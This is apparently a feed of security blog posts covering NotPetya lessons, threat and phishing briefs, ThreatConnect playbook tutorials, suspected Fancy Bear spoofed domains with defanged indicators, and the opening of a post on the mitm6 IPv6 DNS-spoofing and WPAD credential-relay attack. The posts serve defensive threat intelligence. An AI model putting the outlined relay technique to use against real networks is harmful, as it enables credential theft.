We now know that, behind the scenes, Maersk’s IT staff mounted a heroic effort: reinstalling over 4,000 servers, 45,000 PCs, and 2,500 applications over the course of ten days in late June and early July 2017, according to statements by the company’s chairman at the World Economic Forum in Davos in January. The attack cost Maersk more than $300 million to recover from. But its effects rippled out to companies large and small as well. Stacy’s firm had to spend money having the blowout preventer surveyed in Bremerhaven to make sure it was not damaged by sitting on the dock. Firms that were lined up to transport the part to the offshore rig in late June also lost business. The oil rig the part was destined for sat idle waiting for its arrival. The cost to the global economy is unknown - but is certain to total billions, if not hundreds of billions, of dollars.

What is the moral of this story for executives at firms like Stacy’s? Not falling victim to the next NotPetya means figuring out which weaknesses the attack exposed and addressing them. But it also requires firms to stay ahead of threats so that they can anticipate new attacks, not merely respond to them.

What were NotPetya’s lessons? Here are some to consider:

Reimagine your risk

Conventional wisdom has been that cyber attacks – though disruptive – are manageable. Outbreaks like NotPetya and WannaCry challenge that established wisdom.

Both attacks were not merely disruptive but destructive: wiping out systems they infected, rather than simply hijacking them or holding their data ransom. The operational impact on the affected companies was severe. Maersk, for example, was forced to revert to pen and paper to run its business for days while it rebuilt its IT systems from scratch.

“Imagine a company where a ship with 20,000 containers would enter a port every 15 minutes, and for ten days you have no IT,” Chairman Snabe said at Davos.

The lesson for your firm is clear: you need to reimagine the risks to your firm and its operations. In addition to formulating clear contingency plans for major outbreaks (robust, offsite backup and recovery plans certainly beat pen and paper), your firm should re-evaluate its assumptions about worst case scenarios as it weighs current and future information security investments and add some zeros to the “cost of doing nothing.”

Think holistically about threats to your organization

Maersk wasn’t the only global firm affected by NotPetya. FedEx suffered by way of its TNT Express acquisition. U.S.-based candy maker Mondelez and drug giant Merck were also hit hard by the virus. What’s interesting is that none of these firms were intended targets of NotPetya. Rather, they were collateral damage of an attack that experts believe was a Russian-backed campaign designed to disrupt Ukraine’s government and economy.

The moral? Instability in one part of the world (say: the rolling cyber conflict between Russia and Ukraine) can easily spill over national borders in ways that are unpredictable. Maersk’s CEO called his company an “accidental victim” of a nation-state attack. And that’s just about right. The consequence of this is that organizations cannot be too narrowly focused on known threats.

Quality threat intelligence from a reliable provider can help, but you also need to be able to integrate that threat intelligence into your IT operations and information security workflow. An example: NotPetya spread rapidly within corporate networks because it was married to powerful, Windows based exploits known as “Eternal Romance” and “Eternal Blue.” Threat intelligence noting that both nation-state actors and cyber criminal “ransomware” groups were actively leveraging those exploits should have escalated patching and remediation efforts internally. Better patching would have stopped or limited the spread of NotPetya, greatly reducing its operational impact.
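As a concrete, if simplified, illustration of that integration, a feed of actively exploited CVEs can be joined against an asset inventory to decide which hosts jump the patching queue. In the sketch below, CVE-2017-0144 is EternalBlue (fixed by MS17-010); the inventory, host names, and the second CVE are invented for the example.

```python
# CVEs flagged by threat intelligence as under active exploitation.
# CVE-2017-0144 is EternalBlue; the patch is Microsoft's MS17-010 bulletin.
ACTIVELY_EXPLOITED = {"CVE-2017-0144"}

# Hypothetical inventory: host -> set of CVEs it is still unpatched against.
inventory = {
    "file-server-01": {"CVE-2017-0144", "CVE-2016-9999"},
    "hr-laptop-07": {"CVE-2016-9999"},
}

def escalate_patching(inventory, exploited):
    """Return hosts missing a patch for a CVE under active exploitation."""
    return sorted(host for host, missing in inventory.items()
                  if missing & exploited)

print(escalate_patching(inventory, ACTIVELY_EXPLOITED))
```

The point is the workflow, not the code: intelligence about active exploitation should change patching priority automatically, not sit in a report.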

Prioritize third party risk

A clear lesson of NotPetya is that third party risk is real and that companies and Boards of Directors need to pay a lot more attention to it.

How so? One of NotPetya’s initial avenues of infection was via a Ukrainian maker of financial software, M.E. Docs. That company, which had been compromised by hackers, unwittingly distributed a signed software update that installed the malware. More than 2,000 firms in Ukraine alone found themselves infected.

Should the presence of an application from a Ukrainian firm on your network raise alarms? Possibly - especially when coupled with threat intelligence about similar efforts by nation-state actors to infiltrate and disrupt Ukrainian firms. A more holistic approach would be to assess the many software and hardware supply chains your firm relies on and the risk and possible consequences of any supply chain attack, then introduce processes that mitigate such risks internally.


Paul Roberts is the Editor in Chief at The Security Ledger. You can follow him online at: @paulfroberts and @securityledger.

The post NotPetya’s Challenge? Re-Prioritize Your Information Security appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 13, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Japanese game developer Nippon Ichi Software (NIS) has suffered a major data breach and is offering customers, er, $5 as compensation. In an email sent to customers last week, NIS admitted that its American arm had fallen victim to a breach compromising the personal and financial data of its online customers. While it’s unclear how many customers have been affected, NIS has confirmed that the breach took place between 3 January and 26 February and affected two of its online stores, which have since been taken offline. However, during that time frame, hackers were able to make off with customers’ payment card details, email addresses and address information, although NIS has said that those who ordered using PayPal have not been affected. NIS noted that it does not store customers’ payment card information and that user accounts are used “primarily to track past orders and gain rewards points.” “Data for past orders is stored securely and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date,” NIS said. NIS is recommending, naturally, that all customers change their passwords immediately and check their card statements for any suspicious activity.”

 –The Inquirer


“A new analysis of industrial control components used by utilities indicated 61 percent of them could cause “severe operational impact” if affected by a cyberattack. The research from cybersecurity firm Dragos, as reported by The Daily Beast, looked at 163 new security vulnerabilities that came to light last year. So far, 72 percent of the vulnerabilities have no known way to be closed. However, only 15 percent of the vulnerabilities are accessible from the outside, with the rest requiring the attacker to have already gained access to a plant operations network. The majority of the security holes are in equipment that are already tightly secured in other ways. The report by Dragos, which covers an array of potential cybersecurity threats worldwide, notes Russian hackers caused an electrical outage in Ukraine over a year ago, and North Korea may be looking to do the same in the United States. Currently, malware known as Covellite is attacking electric utilities in the United States, Europe and parts of east Asia with spear-phishing attacks.”

Power Engineering

Operational Risk

“A security firm, the Romanian Police, and Europol allegedly gained access to the GandCrab Ransomware’s Command & Control servers, which allowed them to recover some of the victims’ decryption keys. This allowed researchers to release a tool that could decrypt some victims’ files. After this breach, the GandCrab developers stated that they would release a second version of GandCrab that included a more secure command & control server in order to prevent a similar compromise in the future. Researchers have since discovered that GandCrab version 2 was released, which contains changes that supposedly make it more secure and allow us to differentiate it from the original version.”

Bleeping Computer

Reputational Risk

“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”

 – BBC

The post Weekly Threat Intelligence Brief: March 13, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 12, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 4 – 11, 2018.

This week, we saw a large increase in overall phishing activity – 50% – for the top 20 brands we monitor, with the largest increase in activity coming from Internet Search & Navigation Services and the largest decrease from Computer Hardware. Only two industries saw decreases in phishing this week.

The top 5 industries that saw an increase in phishing activity this week:

  1. Internet Search & Navigation Services (>180%)
  2. Telecommunications (>125%)
  3. Storage & Systems Management Software (>65%)
  4. Computer Software (>45%)
  5. eCommerce (>30%)


The top 2 industries that saw a decrease in phishing activity this week: 

  1. Computer Hardware (>80%)
  2. Electronic Payment Systems (>15%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.

The post Weekly Phishing Report: March 12, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Thwart Cyber Attackers by Inverting Your Strategy

When it comes to your organization’s cybersecurity, there is no “one size fits all” solution. In the face of today’s dynamic threats – bad actors constantly find new and innovative ways to circumvent existing security apparatuses – many organizations are struggling to get ahead of an attack.

Yes, the more you know – what adversaries are operating in the space, the techniques and procedures leveraged by them, and the tools and vulnerabilities used and exploited to ensure that their efforts yield success – the better positioned you are to defend your assets. However, have you ever thought about approaching this from what we call an “effects-based” approach – looking at the end game of an action as your starting point? By doing so, you’ll better understand the larger cyber threat landscape, and where your organization falls within it.

Initially a military concept, Effects-Based Operations (EBOs) systemically evaluate incidents (such as a major hack) through the lens of strategic centers of gravity — leadership, key essentials, infrastructure, population and military forces. EBOs look at the totality of the system being acted upon and determine the most effective means to achieve the desired end state.

It puts the attackers’ “bottom line” – in this case, their intended consequence – up front, with the purpose of analytically working back from that point to the perpetrator rather than the other way around. This allows network defenders to investigate how current tactics employed by hackers would work against their organization. In addition, security teams can explore other avenues not yet compromised (but that could be) to identify future threat trends.

Toward this end, security teams can look at the impact of cyber incidents within their respective industries and verticals to begin understanding how and why hostile actors are implementing specific attacks – and what they may look for in targeting their organization.

Recognizing the latter (i.e., data exfiltration or disruptive attacks), rather than focusing on the means and manners in which these objectives are carried out, enables network defenders to identify the causal linkages between such incidents, adding to their core knowledge base of attackers and their operations.

Examples of effects-based trends include infrastructure impedance such as those resulting from distributed denial-of-service (DDoS) attacks; influence schemes (e.g. the suspected Russian hacking of the Democratic National Convention and state voter registration systems); data aggregation typically associated with cyber espionage; “false flag” operations in which adversaries purposefully leave data to implicate another source; and cyber-informed kinetics.

In a domain that continues to favor attackers, network defenders must find any advantage they can to compete against an adversary. An Effects-Based Operation for cybersecurity complements conventional strategies. With this, security teams sift through the volume of looming threats, identifying those that are most pertinent to their enterprise’s interests. This prepares them not only for the near term, but the future as well.

At LookingGlass, we provide clients with a suite of products and services that deliver unified threat protection against sophisticated cyber attacks. If you’d like to learn more about what we can do for your organization, please contact us.


The post Thwart Cyber Attackers by Inverting Your Strategy appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 7, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“According to a Quick Heal report released on Monday, in 2017 their Security Labs detected over 930 million Windows malware samples that targeted individuals and businesses. The year was dominated by several exploits leaked by the hacker group “The Shadow Brokers,” such as EternalBlue, EternalChampion, EternalRomance and EternalScholar, which were responsible for advanced ransomware campaigns such as WannaCry and NotPetya, and a few cryptocurrency mining campaigns. Sanjay Katkar, Joint Managing Director and Chief Technology Officer of Quick Heal Technologies Limited, said that the problem of ransomware is going to exacerbate because of the growing availability of exploit kits and ransomware-as-a-service.”


Information Security Risk

“A newly uncovered form of Android malware secretly steals sensitive data from infected devices – including full audio recordings of phone calls – and stores it in cloud storage accounts. An invasive form of spyware, RedDrop harvests information from the device, including live recordings of its surroundings, user data including files, photos, contacts, notes, device data and information about saved Wi-Fi networks and nearby hotspots. The first time the malware was seen, it was being distributed via a Chinese language adult content app called CuteActress, but others target those speaking English and other languages. “This is very much a global operation,” a security researcher reported.”


Operational Risk

“An endpoint security firm has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware. The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns. After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.”

Security Week




The post Weekly Threat Intelligence Brief: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 7, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from February 25 – March 3, 2018.

This week, we saw a large decrease in overall phishing activity – 39% – for the top 20 brands we monitor, with the largest increase in activity coming from Telecommunications and the largest decrease from eCommerce. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Telecommunications (>40%)
  2. Internet Information Services (>30%)
  3. Computer Hardware (>1%)


The top 5 industries that saw a decrease in phishing activity this week: 

  1. eCommerce (>62%)
  2. Internet Search & Navigation Services (>60%)
  3. Computer Software (>45%)
  4. Storage Systems & Management Software (>35%)
  5. Electronic Payment Systems (>28%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.

The post Weekly Phishing Report: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Query a Host or URL Indicator in Archive.org's Wayback Machine

One-Click querying of the Wayback Machine

See if a website has been archived in the Wayback Machine

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

When investigating phishing pages, it can be helpful to see what a malicious website looks like. This can help you identify which organization the phishing page is spoofing and possibly whether or not a phishing kit is being used. Sometimes, however, the phishing page is taken down before an analyst gets a chance to see it. Archive.org's Wayback Machine can be helpful in these cases, as it allows anyone to archive a snapshot of a website. This playbook allows you to check if a Host or URL Indicator has already been archived in the Wayback Machine.

One-click querying of the Wayback Machine

This playbook is triggered with a User Action Trigger available on the page for all Host and URL Indicators.

Once triggered, the playbook queries Archive.org's Wayback Machine to see if the indicator has been archived. If it has, the playbook returns a link to the archived website. Otherwise, it will let you know that the indicator has not yet been archived.
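Outside of a ThreatConnect Playbook, the same check can be made directly against Archive.org's public availability endpoint. The sketch below separates the network lookup from the response parsing; the endpoint and response shape reflect the Wayback availability API as publicly documented, and the sample payload is fabricated.

```python
import json
from typing import Optional
from urllib.parse import urlencode
from urllib.request import urlopen

AVAILABILITY_API = "https://archive.org/wayback/available"

def parse_snapshot(payload: dict) -> Optional[str]:
    """Extract the closest archived snapshot URL from an API response."""
    closest = payload.get("archived_snapshots", {}).get("closest")
    if closest and closest.get("available"):
        return closest["url"]
    return None

def wayback_lookup(indicator: str) -> Optional[str]:
    """Query the availability endpoint for a host or URL indicator.
    Requires network access; returns None if nothing is archived."""
    query = urlencode({"url": indicator})
    with urlopen(f"{AVAILABILITY_API}?{query}") as resp:
        return parse_snapshot(json.load(resp))

# Fabricated sample response, as the API returns one for an archived URL.
sample = {"archived_snapshots": {"closest": {
    "available": True, "status": "200",
    "url": "http://web.archive.org/web/20180101000000/http://example.com/"}}}
print(parse_snapshot(sample))
```

An empty `archived_snapshots` object in the response means the indicator has never been archived, which maps to the playbook's "not yet archived" message.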

This playbook requires no configuration. Just install and turn it on!

The post Query a Host or URL Indicator in Archive.org's Wayback Machine appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solution’s key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the price based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine the technical steps, personnel, tools, support requirements and associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationships for product delivery, if applicable.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially conflicting priorities and incentives among groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially easier access to funding for sophisticated projects and complex products
  • Possibly easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who has been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Playbook Fridays:  Using Playbooks to populate custom attributes

Create Custom Attribute Types and Validation Rules, then use Playbooks to populate them automatically

I was working with a customer who wanted to use ThreatConnect's Task and workflow features like a traditional ticketing system, with a unique identifier for data objects that they could key off of and pass to other teams as needed. This is usually a value like an "Incident Number" or "Task ID". ThreatConnect has these values, and you can see them in the weblink URL for any data object within the Platform. The customer wanted to pass these identifiers to other users, teams, and applications, so we decided to use a combination of custom attributes, custom attribute validation rules, and Playbooks to make the data easier to work with and meet their goals. Along the way we also found that, once created and populated, our new attributes were searchable within ThreatConnect.

In this post, you'll learn how to do the following in ThreatConnect:

  • Create a custom attribute type
  • Create a custom attribute validation rule
  • Use Playbooks to automatically populate the new custom attribute
  • Use the Basic filters on the Browse page to find a record with a specific value in the attribute
  • Use the ThreatConnect Query Language (TQL) and Advanced filters to find records matching a pattern in the attribute

Note: This example could easily be reused for other purposes.

Perhaps you want to poll an external data source such as DomainTools and fill an attribute with the retrieved value each time you create a new incident record. This process will show you how. And if you need some other custom attribute, the steps taken here will guide you in creating the necessary configuration.

First: for any of the Group data types, ThreatConnect already creates a unique identifier which is visible in the weblink URL:


In this example, we can see an incident with the identifier "672522". This is the single value that identifies this incident within the organization. With this piece of information, we can always trace back to exactly this incident. This URL is where we will harvest the identifier and place it into a new attribute, which we will create.

We'll create an attribute called "TC ID Number" and make it available to Group data types such as Adversaries, Incidents, Tasks, and Threats. Rather than calling this attribute something like "Incident Number", we'll deliberately keep the name generic so that it is useful across multiple data types. You'll see the value of this decision later in the article.

Before we create the attribute, we will create an Attribute Validation Rule. This will simply validate the data that anyone places into this attribute. In this case, we'll use a simple rule to validate that only digits are entered. We'll call this rule the "TC ID Number validation rule". To create a rule, select "Org Config" in the drop-down menu, and then select "Attribute Validation Rules".  Create a "New" rule, and complete the form as follows:
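To illustrate what the rule enforces, a digits-only check can be expressed as a regular expression. The Python sketch below is a hypothetical stand-in for the Platform's validation (it assumes a regex-based rule; the constant and function names are mine):

```python
import re

# Hypothetical stand-in for the "TC ID Number validation rule":
# assuming a regex-based rule, "digits only" is simply:
TC_ID_RULE = r"^\d+$"

def passes_validation(value):
    """True if the value would pass the digits-only rule."""
    return re.fullmatch(TC_ID_RULE, value) is not None
```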




Save this rule. Now you are ready to create the new attribute. From the same Org Config page, choose the link for "Attribute Types", and then create a "New" attribute. Complete the form as follows:


Notice we are creating an attribute called "TC ID Number". We set a maximum length of 16 characters, and selected several Groups where this attribute may be used. We have also selected our validation rule from the previous step.

This instance of ThreatConnect now has a new attribute available. The obvious question is, how do you put it into action? You can, of course, add this attribute to your Groups manually, one at a time, but what if we applied it automatically whenever the group object is created?

That's where Playbooks comes in!

Following is one of four Playbooks I created to utilize this new attribute. The Playbooks are triggered when a new Group object is created in My Org. The Playbook extracts the identifier from the URL, and stores it in the new attribute. The Playbook looks like this:
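The extraction step at the heart of these Playbooks can be sketched in a few lines of Python. This is an illustration, not a Playbook app: the example URL reflects the weblink format shown earlier (identifier as the final query parameter), and the helper name is mine:

```python
import re

def extract_tc_id(weblink):
    """Pull the trailing numeric identifier out of a group's weblink URL."""
    match = re.search(r"=(\d+)$", weblink)
    return match.group(1) if match else None

# Illustrative weblink for the incident shown earlier:
url = "https://app.threatconnect.com/auth/incident/incident.xhtml?incident=672522"
```

In the Playbook itself, the equivalent logic runs in a regex-extraction step whose output is written into the "TC ID Number" attribute.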




It does not matter how the new group object (incident, in this example) is created. It could have been created manually through the Create Group wizard, or it could have been copied into my org from another source, such as the ThreatConnect Intelligence source. The Playbook will trigger on the new object and fill in the attribute automatically. Below we have multiple Playbooks to make this possible:



After the Playbooks are installed, configured, and set to Active status, any of the defined groups that are created will have the "TC ID Number" attribute populated.  

Moving forward, you now have a state where the TC ID Numbers are populated. You can pass these values to other users or even other systems for tracking purposes. For instance, your IR team might use an external ticketing system like ServiceNow to receive data about new investigations to begin. You could pass the weblink URL of your incidents in ThreatConnect to ServiceNow and perhaps use the TC ID Number as the display value for the link. Passing these values to ServiceNow is very straightforward with Playbooks, but beyond the scope of this blog.

Recall that I mentioned that our new attribute would be searchable. That's available to us now without any additional configuration. On the Browse page, we can select the Group types we want to browse, then in the Filters, we can select the attribute by name. Here are those three steps:



In this example, the filter is looking for a group with the identifier shown earlier (672522). The result is:




Notice we have filtered on our specific attribute and value. We found the exact entry we were searching for, and as a final confirmation we can see the "TC ID Number" for the incident in question:




You can find an exact value. But you might want to view a range of values with your new attribute. This is possible, but you have to move from the Basic filters on the Browse page to the Advanced filters. First, though, you need to configure the search as we did above, looking for our new attribute. This is essential because it will be carried over to the Advanced search and will show the database name of the new custom attribute. So to complete this step, configure the filters as before, and select the "Apply" button. It doesn't matter at this point whether you have results or not; we simply want to compose the search. Next, select the "Advanced" link at the top right of the page:



When we jump over to the Advanced search page, we see our search filters converted to the ThreatConnect Query Language (TQL)!




And in this example you see that the custom attribute we called "TC ID Number" has the internal name "attribute661". We can now take advantage of the features in TQL to add wildcards to our search. For example, I could ask it to show all group objects with a TC ID Number that starts with "672". I do this by using two features of TQL: the "like" operator and the "%" wildcard character. By searching for attribute661 like "672%", it will show any records where the attribute starts with "672":


Hmm.  Only one hit.  Let's open it up and look at any groups starting with a "6":
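For reference, the widened query reads as follows (recall that "attribute661" is the internal name this particular instance assigned to our custom attribute; yours will differ):

```
attribute661 like "6%"
```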




As you can see there are Threats, Incidents, Tasks, and Adversaries which all contain a value in the "TC ID Number" field starting with a "6".  

In summary, we started with a desire to show the assigned unique identifier for incidents, and ended up with a validated custom attribute which can be used across multiple group types, and is searchable with both the Basic and Advanced filters on the Browse page. And, you can pass the TC ID Number to other integrations through Playbooks if you choose to.

The post Playbook Fridays:  Using Playbooks to populate custom attributes appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Duping Doping Domains

Possible Fancy Bear Domains Spoofing Anti-Doping and Olympic Organizations

Update - 1/19/18

We recently identified two additional domains -- login-ukad[.]org[.]uk and adfs-ukad[.]org[.]uk -- which appear to spoof UK Anti-Doping (UKAD). The login-ukad[.]org[.]uk domain uses the Domains4Bitcoins name server previously mentioned and, as of January 19, 2018, is hosted on a dedicated server at the IP 185.189.112[.]191. This IP address is in the same block as a previously identified IP that hosts the USADA-spoofing domain webmail-usada[.]org. SOA records for the login-ukad[.]org[.]uk domain indicate the domain was registered using the email address luciyvarn@protonmail[.]com. No other domains registered using that email address have been identified.

Using a DomainTools Reverse WHOIS search, we can identify that adfs-ukad[.]org[.]uk uses the same "Zender inc" organization name and "Vapaudenkatu 57" address string as login-ukad[.]org[.]uk. While this domain is not currently hosted on a dedicated server, it also appears to spoof UKAD. Given the consistency in spoofing UKAD, it suggests that the actor behind these domains may be engaged in a concerted effort against the UKAD or using their name to target others outside of the organization.

As with the domains originally identified, we have no indication that these domains have been used in operations, but some of their registration and hosting information is consistent with previously identified Fancy Bear infrastructure. While these domains are not definitively attributable to Fancy Bear, given these consistencies they merit additional scrutiny. This information has been shared in our Common Community in Incident 20180119A: UKAD Spoofed Domains.

On 10 January, the Fancy Bears' HT - a faketivist most likely generated to release information garnered from Fancy Bear/APT28/Sofacy operations - released a post suggesting they had compromised emails from the International Olympic Committee (IOC). While we cannot verify the legitimacy or provenance of those leaked emails, ThreatConnect has identified spoofed domains imitating the World Anti-Doping Agency (WADA), the US Anti-Doping Agency (USADA), and the Olympic Council of Asia (OCASIA). These suspicious domains have consistencies with other previously identified Fancy Bear infrastructure and raise the question of a broader campaign against the upcoming 2018 winter games.


At this time, we cannot confirm whether these domains have been used maliciously nor definitively tie them to Fancy Bear without additional data. ThreatConnect has notified the spoofed organizations.


Fancy Bears' HT doing faketivist things



Way Back When...In 2016

We're old enough to remember when Russian threat actors hacked the World Anti-Doping Agency (WADA) in the summer of 2016 after WADA recommended Russian athletes be banned from the 2016 games in Rio due to a large-scale state-backed doping program. After that hack, over 40 athletes' personal data was leaked.

When the IOC banned Russia from the upcoming winter games in South Korea due to systematic doping, we thought the stage was set for more retaliatory hacks. If you're unfamiliar with said doping scandal check out the documentary Icarus on Netflix (@IcarusNetflix).


Concerted Effort to Spoof USADA

In the course of our ongoing efforts to monitor domains registered through registrars that Fancy Bear has shown a tendency to use, we recently identified the domain webmail-usada[.]org, which spoofs the USADA's legitimate domain. This domain was registered on December 21, 2017 and uses the Domains4Bitcoins name server that Fancy Bear has previously used. Additionally, as of January 10, 2018, this domain is hosted on a dedicated server at the IP 185.189.112[.]242.


ThreatConnect's DNS Resolution History for webmail-usada[.]org


While the domain was registered using privacy protection, start of authority (SOA) records for the webmail-usada[.]org domain indicate the domain was registered using the email address jeryfisk@tuta[.]io.



Hurricane Electric SOA information on webmail-usada[.]org


Using Iris from our friends at DomainTools, we can identify that this email address was also recently used in the SOA records to register another USADA-spoofing domain usada[.]eu.




DomainTools Iris results for jeryfisk@tuta[.]io


This domain is not currently hosted, and no other domains registered using that email address have been identified. However, the consistency in spoofing USADA suggests that the actor behind these domains may be engaged in a concerted effort against the USADA or may be using their name to target others outside of the organization. This information has been shared in our Common Community in Incident 20180103B: USADA Spoofed Domains.


Guilt By Registrant Associations

We also identified a third domain, wada-adams[.]org, which spoofs the WADA's legitimate domain and its Anti-Doping Administration and Management System (ADAMS). While this domain does not use a small or boutique name server of the kind Fancy Bear has favored, and it is currently parked, it was registered on December 14, 2017 using the email address wadison@tuta[.]io.



Additional domain registered by wadison@tuta[.]io


This email address has only registered one other domain, networksolutions[.]pw, which uses the previously mentioned Domains4Bitcoins name server and, as of January 10, 2018, is hosted on a dedicated server at the IP 23.227.207[.]182. The WADA-spoofing domain is currently parked; however, given the consistencies between wadison@tuta[.]io's networksolutions[.]pw domain and previously identified Fancy Bear infrastructure, it merits additional scrutiny. This information has been shared in our Common Community in Incident 20180103C: Domains Registered by


Olympic Council of Asia Spoofed Domain

Another interesting domain, ocaia[.]org, also recently came across our desks during Fancy Bear research. This domain was registered on December 25, 2017 and uses a THCServers name server -- another Fancy Bear favorite -- and appears to spoof OCASIA's legitimate domain ocasia[.]org. It should be noted that this spoofed domain is co-located on the IP 193.29.187[.]143 with about six other domains. Fancy Bear's domains often use dedicated servers, but given the subject and timing of this registration, defenders should also be on the lookout for this domain. This information has been shared in Incident 20180110B: Olympic Council of Asia Spoofed Domain.



We're going to reiterate something here: At the time of this blog's publishing, we don't know whether any of the infrastructure identified in this post is actually being used maliciously. But that's okay. In fact, we'd argue that if you're only concerned about what is known to be bad, you're going to be had.

While these domains are not definitively attributable to Fancy Bear, given these domains' consistencies and Fancy Bears' HT posts, they merit additional scrutiny. Furthermore, this incident highlights the importance of identifying activity that is consistent with adversaries' known infrastructure registration and hosting tactics. In doing so, organizations can incorporate a proactive approach to threat intelligence that may identify indicators like these that are associated with their adversaries before they are used against them.

The post Duping Doping Domains appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

mitm6 – compromising IPv4 networks via IPv6

While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server, redirecting traffic to an attacker-specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

